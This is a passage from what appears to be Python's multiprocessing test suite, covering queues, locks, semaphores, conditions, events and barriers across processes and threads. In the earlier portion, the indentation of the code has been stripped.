self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
    """Tests for Queue/JoinableQueue across the process/manager/thread types."""

    @classmethod
    def _test_put(cls, queue, child_can_start, parent_can_continue):
        # Child: once allowed to start, drain six items, then signal parent.
        child_can_start.wait()
        for i in range(6):
            queue.get()
        parent_can_continue.set()

    def test_put(self):
        # Exercise every put() calling convention plus Full/timeout behaviour.
        MAXSIZE = 6
        queue = self.Queue(maxsize=MAXSIZE)
        child_can_start = self.Event()
        parent_can_continue = self.Event()

        proc = self.Process(
            target=self._test_put,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()

        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)

        # All equivalent spellings of a successful put.
        queue.put(1)
        queue.put(2, True)
        queue.put(3, True, None)
        queue.put(4, False)
        queue.put(5, False, None)
        queue.put_nowait(6)

        # the values may be in buffer but not yet in pipe so sleep a bit
        time.sleep(DELTA)

        self.assertEqual(queue_empty(queue), False)
        self.assertEqual(queue_full(queue, MAXSIZE), True)

        put = TimingWrapper(queue.put)
        put_nowait = TimingWrapper(queue.put_nowait)

        # Non-blocking puts on a full queue fail immediately...
        self.assertRaises(pyqueue.Full, put, 7, False)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put, 7, False, None)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put_nowait, 7)
        self.assertTimingAlmostEqual(put_nowait.elapsed, 0)

        # ...while blocking puts honour the requested timeout.
        self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)

        self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)

        # Let the child drain the queue and confirm it ends up empty.
        child_can_start.set()
        parent_can_continue.wait()

        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)

        proc.join()
        close_queue(queue)

    @classmethod
    def _test_get(cls, queue, child_can_start, parent_can_continue):
        # Child: once allowed to start, feed four items, then signal parent.
        child_can_start.wait()
        #queue.put(1)
        queue.put(2)
        queue.put(3)
        queue.put(4)
        queue.put(5)
        parent_can_continue.set()

    def test_get(self):
        # Exercise every get() calling convention plus Empty/timeout behaviour.
        queue = self.Queue()
        child_can_start = self.Event()
        parent_can_continue = self.Event()

        proc = self.Process(
            target=self._test_get,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()

        self.assertEqual(queue_empty(queue), True)

        child_can_start.set()
        parent_can_continue.wait()

        time.sleep(DELTA)
        self.assertEqual(queue_empty(queue), False)

        # Hangs unexpectedly, remove for now
        #self.assertEqual(queue.get(), 1)
        self.assertEqual(queue.get(True, None), 2)
        self.assertEqual(queue.get(True), 3)
        self.assertEqual(queue.get(timeout=1), 4)
        self.assertEqual(queue.get_nowait(), 5)

        self.assertEqual(queue_empty(queue), True)

        get = TimingWrapper(queue.get)
        get_nowait = TimingWrapper(queue.get_nowait)

        # Non-blocking gets on an empty queue fail immediately...
        self.assertRaises(pyqueue.Empty, get, False)
        self.assertTimingAlmostEqual(get.elapsed, 0)

        self.assertRaises(pyqueue.Empty, get, False, None)
        self.assertTimingAlmostEqual(get.elapsed, 0)

        self.assertRaises(pyqueue.Empty, get_nowait)
        self.assertTimingAlmostEqual(get_nowait.elapsed, 0)

        # ...while blocking gets honour the requested timeout.
        self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)

        self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, 0)

        self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)

        proc.join()
        close_queue(queue)

    @classmethod
    def _test_fork(cls, queue):
        for i in range(10, 20):
            queue.put(i)
        # note that at this point the items may only be buffered, so the
        # process cannot shutdown until the feeder thread has finished
        # pushing items onto the pipe.

    def test_fork(self):
        # Old versions of Queue would fail to create a new feeder
        # thread for a forked process if the original process had its
        # own feeder thread. This test checks that this no longer
        # happens.

        queue = self.Queue()

        # put items on queue so that main process starts a feeder thread
        for i in range(10):
            queue.put(i)

        # wait to make sure thread starts before we fork a new process
        time.sleep(DELTA)

        # fork process
        p = self.Process(target=self._test_fork, args=(queue,))
        p.daemon = True
        p.start()

        # check that all expected items are in the queue
        for i in range(20):
            self.assertEqual(queue.get(), i)
        self.assertRaises(pyqueue.Empty, queue.get, False)

        p.join()
        close_queue(queue)

    def test_qsize(self):
        q = self.Queue()
        try:
            self.assertEqual(q.qsize(), 0)
        except NotImplementedError:
            # qsize() relies on sem_getvalue(), which some platforms lack.
            self.skipTest('qsize method not implemented')
        q.put(1)
        self.assertEqual(q.qsize(), 1)
        q.put(5)
        self.assertEqual(q.qsize(), 2)
        q.get()
        self.assertEqual(q.qsize(), 1)
        q.get()
        self.assertEqual(q.qsize(), 0)
        close_queue(q)

    @classmethod
    def _test_task_done(cls, q):
        # Worker: consume until a None sentinel arrives, acknowledging each.
        for obj in iter(q.get, None):
            time.sleep(DELTA)
            q.task_done()

    def test_task_done(self):
        queue = self.JoinableQueue()

        workers = [self.Process(target=self._test_task_done, args=(queue,))
                   for i in range(4)]

        for p in workers:
            p.daemon = True
            p.start()

        for i in range(10):
            queue.put(i)

        # join() returns only after every item has been task_done()'d.
        queue.join()

        # One None sentinel per worker shuts them all down.
        for p in workers:
            queue.put(None)

        for p in workers:
            p.join()
        close_queue(queue)

    def test_no_import_lock_contention(self):
        # Using a queue inside an import must not deadlock on the import lock.
        with test.support.temp_cwd():
            module_name = 'imported_by_an_imported_module'
            with open(module_name + '.py', 'w') as f:
                f.write("""if 1:
                    import multiprocessing
                    q = multiprocessing.Queue()
                    q.put('knock knock')
                    q.get(timeout=3)
                    q.close()
                    del q
                """)

            with test.support.DirsOnSysPath(os.getcwd()):
                try:
                    __import__(module_name)
                except pyqueue.Empty:
                    self.fail("Probable regression on import lock contention;"
                              " see Issue #22853")

    def test_timeout(self):
        q = multiprocessing.Queue()
        start = time.monotonic()
        self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
        delta = time.monotonic() - start
        # bpo-30317: Tolerate a delta of 100 ms because of the bad clock
        # resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
        # failed because the delta was only 135.8 ms.
        self.assertGreaterEqual(delta, 0.100)
        close_queue(q)

    def test_queue_feeder_donot_stop_onexc(self):
        # bpo-30414: verify feeder handles exceptions correctly
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        class NotSerializable(object):
            def __reduce__(self):
                raise AttributeError

        with test.support.captured_stderr():
            q = self.Queue()
            q.put(NotSerializable())
            q.put(True)
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
            close_queue(q)

        with test.support.captured_stderr():
            # bpo-33078: verify that the queue size is correctly handled
            # on errors.
            q = self.Queue(maxsize=1)
            q.put(NotSerializable())
            q.put(True)
            try:
                self.assertEqual(q.qsize(), 1)
            except NotImplementedError:
                # qsize is not available on all platform as it
                # relies on sem_getvalue
                pass
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
            # Check that the size of the queue is correct
            self.assertTrue(q.empty())
            close_queue(q)

    def test_queue_feeder_on_queue_feeder_error(self):
        # bpo-30006: verify feeder handles exceptions using the
        # _on_queue_feeder_error hook.
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        class NotSerializable(object):
            """Mock unserializable object"""
            def __init__(self):
                self.reduce_was_called = False
                self.on_queue_feeder_error_was_called = False

            def __reduce__(self):
                self.reduce_was_called = True
                raise AttributeError

        class SafeQueue(multiprocessing.queues.Queue):
            """Queue with overloaded _on_queue_feeder_error hook"""
            @staticmethod
            def _on_queue_feeder_error(e, obj):
                if (isinstance(e, AttributeError) and
                        isinstance(obj, NotSerializable)):
                    obj.on_queue_feeder_error_was_called = True

        not_serializable_obj = NotSerializable()
        # The captured_stderr reduces the noise in the test report
        with test.support.captured_stderr():
            q = SafeQueue(ctx=multiprocessing.get_context())
            q.put(not_serializable_obj)

            # Verify that q is still functioning correctly
            q.put(True)
            self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))

        # Assert that the serialization and the hook have been called correctly
        self.assertTrue(not_serializable_obj.reduce_was_called)
        self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)

    def test_closed_queue_put_get_exceptions(self):
        # put()/get() on a closed queue must raise a descriptive ValueError.
        for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
            q.close()
            with self.assertRaisesRegex(ValueError, 'is closed'):
                q.put('foo')
            with self.assertRaisesRegex(ValueError, 'is closed'):
                q.get()
#
#
#
class _TestLock(BaseTestCase):
    """Basic acquire/release semantics of Lock and RLock."""

    def test_lock(self):
        lock = self.Lock()
        self.assertEqual(lock.acquire(), True)
        # A non-recursive lock cannot be acquired a second time.
        self.assertEqual(lock.acquire(False), False)
        self.assertEqual(lock.release(), None)
        # Releasing an unheld lock is an error (exact type varies by TYPE).
        self.assertRaises((ValueError, threading.ThreadError), lock.release)

    def test_rlock(self):
        lock = self.RLock()
        # A recursive lock may be re-acquired by the same owner...
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        self.assertEqual(lock.acquire(), True)
        # ...and must be released the same number of times.
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertEqual(lock.release(), None)
        self.assertRaises((AssertionError, RuntimeError), lock.release)

    def test_lock_context(self):
        # Locks must work as context managers.
        with self.Lock():
            pass
class _TestSemaphore(BaseTestCase):
    """Semaphore and BoundedSemaphore counting and timeout behaviour."""

    def _test_semaphore(self, sem):
        # Shared checks for a semaphore created with an initial value of 2:
        # the counter goes 2 -> 1 -> 0 on acquire and back up on release;
        # a non-blocking acquire at zero fails.
        self.assertReturnsIfImplemented(2, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.acquire(), True)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.acquire(False), False)
        self.assertReturnsIfImplemented(0, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(1, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(2, get_value, sem)

    def test_semaphore(self):
        sem = self.Semaphore(2)
        self._test_semaphore(sem)
        # An unbounded semaphore may be released beyond its initial value.
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(3, get_value, sem)
        self.assertEqual(sem.release(), None)
        self.assertReturnsIfImplemented(4, get_value, sem)

    def test_bounded_semaphore(self):
        sem = self.BoundedSemaphore(2)
        self._test_semaphore(sem)
        # Currently fails on OS/X
        #if HAVE_GETVALUE:
        #    self.assertRaises(ValueError, sem.release)
        #    self.assertReturnsIfImplemented(2, get_value, sem)

    def test_timeout(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        sem = self.Semaphore(0)
        acquire = TimingWrapper(sem.acquire)

        # Non-blocking acquires return immediately whatever the timeout...
        self.assertEqual(acquire(False), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)

        self.assertEqual(acquire(False, None), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)

        self.assertEqual(acquire(False, TIMEOUT1), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0)

        # ...while blocking acquires honour the requested timeout.
        self.assertEqual(acquire(True, TIMEOUT2), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)

        self.assertEqual(acquire(timeout=TIMEOUT3), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
    """Condition-variable notify/notify_all/wait_for/timeout semantics."""

    @classmethod
    def f(cls, cond, sleeping, woken, timeout=None):
        # Child body: report "asleep" via *sleeping*, wait on the condition,
        # then report "woken" via *woken*.
        cond.acquire()
        sleeping.release()
        cond.wait(timeout)
        woken.release()
        cond.release()

    def assertReachesEventually(self, func, value):
        # Poll until func() == value (or the check is unsupported), then
        # assert once more after a settling delay.
        for i in range(10):
            try:
                if func() == value:
                    break
            except NotImplementedError:
                break
            time.sleep(DELTA)
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(value, func)

    def check_invariant(self, cond):
        # this is only supposed to succeed when there are no sleepers
        if self.TYPE == 'processes':
            try:
                sleepers = (cond._sleeping_count.get_value() -
                            cond._woken_count.get_value())
                self.assertEqual(sleepers, 0)
                self.assertEqual(cond._wait_semaphore.get_value(), 0)
            except NotImplementedError:
                pass

    def test_notify(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)

        # One process and one thread wait on the same condition.
        p = self.Process(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)

        p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
        p.daemon = True
        p.start()
        self.addCleanup(p.join)

        # wait for both children to start sleeping
        sleeping.acquire()
        sleeping.acquire()

        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)

        # wake up one process/thread
        cond.acquire()
        cond.notify()
        cond.release()

        # check one process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(1, get_value, woken)

        # wake up another
        cond.acquire()
        cond.notify()
        cond.release()

        # check other has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(2, get_value, woken)

        # check state is not mucked up
        self.check_invariant(cond)
        p.join()

    def test_notify_all(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)

        # start some threads/processes which will timeout
        for i in range(3):
            p = self.Process(target=self.f,
                             args=(cond, sleeping, woken, TIMEOUT1))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)

            t = threading.Thread(target=self.f,
                                 args=(cond, sleeping, woken, TIMEOUT1))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)

        # wait for them all to sleep
        for i in range(6):
            sleeping.acquire()

        # check they have all timed out
        for i in range(6):
            woken.acquire()
        self.assertReturnsIfImplemented(0, get_value, woken)

        # check state is not mucked up
        self.check_invariant(cond)

        # start some more threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)

            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)

        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()

        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)

        # wake them all up
        cond.acquire()
        cond.notify_all()
        cond.release()

        # check they have all woken
        self.assertReachesEventually(lambda: get_value(woken), 6)

        # check state is not mucked up
        self.check_invariant(cond)

    def test_notify_n(self):
        cond = self.Condition()
        sleeping = self.Semaphore(0)
        woken = self.Semaphore(0)

        # start some threads/processes
        for i in range(3):
            p = self.Process(target=self.f, args=(cond, sleeping, woken))
            p.daemon = True
            p.start()
            self.addCleanup(p.join)

            t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
            t.daemon = True
            t.start()
            self.addCleanup(t.join)

        # wait for them to all sleep
        for i in range(6):
            sleeping.acquire()

        # check no process/thread has woken up
        time.sleep(DELTA)
        self.assertReturnsIfImplemented(0, get_value, woken)

        # wake some of them up
        cond.acquire()
        cond.notify(n=2)
        cond.release()

        # check 2 have woken
        self.assertReachesEventually(lambda: get_value(woken), 2)

        # wake the rest of them
        cond.acquire()
        cond.notify(n=4)
        cond.release()

        self.assertReachesEventually(lambda: get_value(woken), 6)

        # doesn't do anything more
        cond.acquire()
        cond.notify(n=3)
        cond.release()

        self.assertReturnsIfImplemented(6, get_value, woken)

        # check state is not mucked up
        self.check_invariant(cond)

    def test_timeout(self):
        # wait() with a timeout and no notifier returns False after ~timeout.
        cond = self.Condition()
        wait = TimingWrapper(cond.wait)
        cond.acquire()
        res = wait(TIMEOUT1)
        cond.release()
        self.assertEqual(res, False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)

    @classmethod
    def _test_waitfor_f(cls, cond, state):
        # Child: zero the shared state, then wait_for it to reach 4;
        # exit code 1 signals failure back to the parent.
        with cond:
            state.value = 0
            cond.notify()
            result = cond.wait_for(lambda : state.value==4)
            if not result or state.value != 4:
                sys.exit(1)

    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', -1)

        p = self.Process(target=self._test_waitfor_f, args=(cond, state))
        p.daemon = True
        p.start()

        with cond:
            result = cond.wait_for(lambda : state.value==0)
            self.assertTrue(result)
            self.assertEqual(state.value, 0)

        for i in range(4):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()

        join_process(p)
        self.assertEqual(p.exitcode, 0)

    @classmethod
    def _test_waitfor_timeout_f(cls, cond, state, success, sem):
        # Child: wait_for a state that never arrives and record whether the
        # timeout fired within a plausible window.
        sem.release()
        with cond:
            expected = 0.1
            dt = time.monotonic()
            result = cond.wait_for(lambda : state.value==4, timeout=expected)
            dt = time.monotonic() - dt
            # borrow logic in assertTimeout() from test/lock_tests.py
            if not result and expected * 0.6 < dt < expected * 10.0:
                success.value = True

    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor_timeout(self):
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', 0)
        success = self.Value('i', False)
        sem = self.Semaphore(0)

        p = self.Process(target=self._test_waitfor_timeout_f,
                         args=(cond, state, success, sem))
        p.daemon = True
        p.start()
        self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))

        # Only increment 3 times, so state == 4 is never reached.
        for i in range(3):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()

        join_process(p)
        self.assertTrue(success.value)

    @classmethod
    def _test_wait_result(cls, c, pid):
        # Child: notify the waiting parent, then (on POSIX) interrupt its
        # second wait with SIGINT.
        with c:
            c.notify()
        time.sleep(1)
        if pid is not None:
            os.kill(pid, signal.SIGINT)

    def test_wait_result(self):
        if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
            pid = os.getpid()
        else:
            pid = None

        c = self.Condition()
        with c:
            self.assertFalse(c.wait(0))
            self.assertFalse(c.wait(0.1))

            p = self.Process(target=self._test_wait_result, args=(c, pid))
            p.start()

            self.assertTrue(c.wait(60))
            if pid is not None:
                self.assertRaises(KeyboardInterrupt, c.wait, 60)

        p.join()
class _TestEvent(BaseTestCase):
    """Event set/clear/wait semantics, including a cross-process wake-up."""

    @classmethod
    def _test_event(cls, event):
        # Child: set the event after a delay so the parent's wait() blocks.
        time.sleep(TIMEOUT2)
        event.set()

    def test_event(self):
        event = self.Event()
        wait = TimingWrapper(event.wait)

        # Removed temporarily, due to API shear, this does not
        # work with threading._Event objects. is_set == isSet
        self.assertEqual(event.is_set(), False)

        # Removed, threading.Event.wait() will return the value of the __flag
        # instead of None. API Shear with the semaphore backed mp.Event
        self.assertEqual(wait(0.0), False)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)

        event.set()

        # See note above on the API differences
        self.assertEqual(event.is_set(), True)
        self.assertEqual(wait(), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # self.assertEqual(event.is_set(), True)

        event.clear()

        #self.assertEqual(event.is_set(), False)

        # A child setting the event must wake this process's wait().
        p = self.Process(target=self._test_event, args=(event,))
        p.daemon = True
        p.start()
        self.assertEqual(wait(), True)
        p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
    """
    A bunch of threads.
    """
    def __init__(self, namespace, f, args, n, wait_before_exit=False):
        """
        Construct a bunch of `n` threads running the same function `f`.

        If `wait_before_exit` is True, the threads won't terminate until
        do_finish() is called.
        """
        self.f = f
        self.args = args
        self.n = n
        # started/finished are atomic counters supplied by the namespace
        # (a plain list, a manager list, or a _DummyList depending on TYPE).
        self.started = namespace.DummyList()
        self.finished = namespace.DummyList()
        self._can_exit = namespace.Event()
        if not wait_before_exit:
            self._can_exit.set()

        threads = []
        for i in range(n):
            p = namespace.Process(target=self.task)
            p.daemon = True
            p.start()
            threads.append(p)

        def finalize(threads):
            for p in threads:
                p.join()

        # Join all workers when this Bunch is close()d or garbage-collected.
        self._finalizer = weakref.finalize(self, finalize, threads)

    def task(self):
        # Body run by each worker: record start, run f, record finish,
        # then optionally block until do_finish() releases everyone.
        pid = os.getpid()
        self.started.append(pid)
        try:
            self.f(*self.args)
        finally:
            self.finished.append(pid)
            self._can_exit.wait(30)
            assert self._can_exit.is_set()

    def wait_for_started(self):
        # Busy-wait until every worker has recorded its start.
        while len(self.started) < self.n:
            _wait()

    def wait_for_finished(self):
        # Busy-wait until every worker has recorded its finish.
        while len(self.finished) < self.n:
            _wait()

    def do_finish(self):
        # Allow workers created with wait_before_exit=True to terminate.
        self._can_exit.set()

    def close(self):
        # Join all workers now rather than at garbage collection.
        self._finalizer()
class AppendTrue(object):
    """Callable that appends True to the sequence given at construction.

    Used e.g. as a Barrier 'action' callback, so it must be picklable.
    """

    def __init__(self, obj):
        # Keep a reference to the (possibly proxied) sequence to grow.
        self.obj = obj

    def __call__(self):
        # Each invocation records one tick by appending True.
        self.obj.append(True)
class _TestBarrier(BaseTestCase):
    """
    Tests for Barrier objects.
    """
    N = 5
    defaultTimeout = 30.0  # XXX Slow Windows buildbots need generous timeout

    def setUp(self):
        self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)

    def tearDown(self):
        self.barrier.abort()
        self.barrier = None

    def DummyList(self):
        # Return an atomic append/len counter appropriate for self.TYPE.
        if self.TYPE == 'threads':
            return []
        elif self.TYPE == 'manager':
            return self.manager.list()
        else:
            return _DummyList()

    def run_threads(self, f, args):
        # Run f(*args) in N-1 children plus the current process/thread.
        b = Bunch(self, f, args, self.N-1)
        try:
            f(*args)
            b.wait_for_finished()
        finally:
            b.close()

    @classmethod
    def multipass(cls, barrier, results, n):
        # Cross the barrier 2*n times, asserting after each crossing that
        # every party completed the previous phase (lockstep).
        m = barrier.parties
        assert m == cls.N
        for i in range(n):
            results[0].append(True)
            assert len(results[1]) == i * m
            barrier.wait()
            results[1].append(True)
            assert len(results[0]) == (i + 1) * m
            barrier.wait()
        try:
            assert barrier.n_waiting == 0
        except NotImplementedError:
            pass
        assert not barrier.broken

    def test_barrier(self, passes=1):
        """
        Test that a barrier is passed in lockstep
        """
        results = [self.DummyList(), self.DummyList()]
        self.run_threads(self.multipass, (self.barrier, results, passes))

    def test_barrier_10(self):
        """
        Test that a barrier works for 10 consecutive runs
        """
        return self.test_barrier(10)

    @classmethod
    def _test_wait_return_f(cls, barrier, queue):
        res = barrier.wait()
        queue.put(res)

    def test_wait_return(self):
        """
        test the return value from barrier.wait
        """
        queue = self.Queue()
        self.run_threads(self._test_wait_return_f, (self.barrier, queue))
        results = [queue.get() for i in range(self.N)]
        # wait() hands out 0..N-1; exactly one party receives 0.
        self.assertEqual(results.count(0), 1)
        close_queue(queue)

    @classmethod
    def _test_action_f(cls, barrier, results):
        barrier.wait()
        # The action must have run exactly once before anyone is released.
        if len(results) != 1:
            raise RuntimeError

    def test_action(self):
        """
        Test the 'action' callback
        """
        results = self.DummyList()
        barrier = self.Barrier(self.N, action=AppendTrue(results))
        self.run_threads(self._test_action_f, (barrier, results))
        self.assertEqual(len(results), 1)

    @classmethod
    def _test_abort_f(cls, barrier, results1, results2):
        try:
            i = barrier.wait()
            if i == cls.N//2:
                # One designated party breaks the barrier via abort().
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()

    def test_abort(self):
        """
        Test that an abort will put the barrier in a broken state
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        self.run_threads(self._test_abort_f,
                         (self.barrier, results1, results2))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertTrue(self.barrier.broken)

    @classmethod
    def _test_reset_f(cls, barrier, results1, results2, results3):
        i = barrier.wait()
        if i == cls.N//2:
            # Wait until the other threads are all in the barrier.
            while barrier.n_waiting < cls.N-1:
                time.sleep(0.001)
            barrier.reset()
        else:
            try:
                barrier.wait()
                results1.append(True)
            except threading.BrokenBarrierError:
                results2.append(True)
        # Now, pass the barrier again
        barrier.wait()
        results3.append(True)

    def test_reset(self):
        """
        Test that a 'reset' on a barrier frees the waiting threads
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        self.run_threads(self._test_reset_f,
                         (self.barrier, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
        self.assertEqual(len(results3), self.N)

    @classmethod
    def _test_abort_and_reset_f(cls, barrier, barrier2,
                                results1, results2, results3):
        try:
            i = barrier.wait()
            if i == cls.N//2:
                raise RuntimeError
            barrier.wait()
            results1.append(True)
        except threading.BrokenBarrierError:
            results2.append(True)
        except RuntimeError:
            barrier.abort()
        # Synchronize and reset the barrier. Must synchronize first so
        # that everyone has left it when we reset, and after so that no
        # one enters it before the reset.
        if barrier2.wait() == cls.N//2:
            barrier.reset()
        barrier2.wait()
        barrier.wait()
        results3.append(True)

    def test_abort_and_reset(self):
        """
        Test that a barrier can be reset after being broken.
        """
        results1 = self.DummyList()
        results2 = self.DummyList()
        results3 = self.DummyList()
        barrier2 = self.Barrier(self.N)
        self.run_threads(self._test_abort_and_reset_f,
                         (self.barrier, barrier2, results1, results2, results3))
        self.assertEqual(len(results1), 0)
        self.assertEqual(len(results2), self.N-1)
